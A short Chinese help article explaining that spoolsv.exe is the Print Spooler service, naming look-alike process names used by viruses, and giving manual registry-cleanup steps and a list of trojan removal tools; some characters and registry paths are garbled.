常被病毒冒充的進程名有：spoo1sv.exe、spolsv.exe。spoolsv.exe是系統(tǒng)服務(wù)"Print Spooler"所對應(yīng)的可執(zhí)行程序，其作用是治理所有本地和網(wǎng)絡(luò)打印隊列及控制所有打印工作。假如此服務(wù)被停用，計算機上的打印將不可用，同時spoolsv.exe進程也會從計算機上消失。假如你不存在打印機設(shè)備，那么就把這項服務(wù)關(guān)閉吧，可以節(jié)省系統(tǒng)資源。停止并關(guān)閉服務(wù)后，假如系統(tǒng)中還存在spoolsv.exe進程，這就一定是病毒偽裝的了。

查殺方法：

手工查殺：

1、運行任務(wù)管理器，殺掉木馬進程。

2、檢查注冊表中RUN、RUNSERVEICE等幾項，先備份，記下可以啟動項的地址， 再將可疑的刪除。

3、刪除上述可疑鍵在硬盤中的執(zhí)行文件。

4、一般這種文件都在WINNT，SYSTEM，SYSTEM32這樣的文件夾下，他們一般不會單獨存在，很可能是有某個母文件復(fù)制過來的，檢查C、D、E等盤下有沒有可疑的.exe，.com或.bat文件，有則刪除之。

5、檢查注冊表HKEY_LOCAL_MACHINE和HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMain中的幾項（如Local Page），如果被修改了，改回來就可以。

6、檢查HKEY_CLASSES_ROOTtxtfileshellopencommand和 HKEY_CLASSES_ROOTxtfileshellopencommand等等幾個常用文件類型的默認(rèn)打開程序是否被更改。這個一定要改回來。很多病毒就是通過修改.txt文件的默認(rèn)打開程序讓病毒在用戶打開文本文件時加載的。

利用工具查殺：

查殺木馬好用的工具有LockDown、The Clean、木馬克星、金山木馬專殺、木馬清除大師、木馬分析專家等，利用這些工具絕大多數(shù)的已知木馬都可以查殺掉。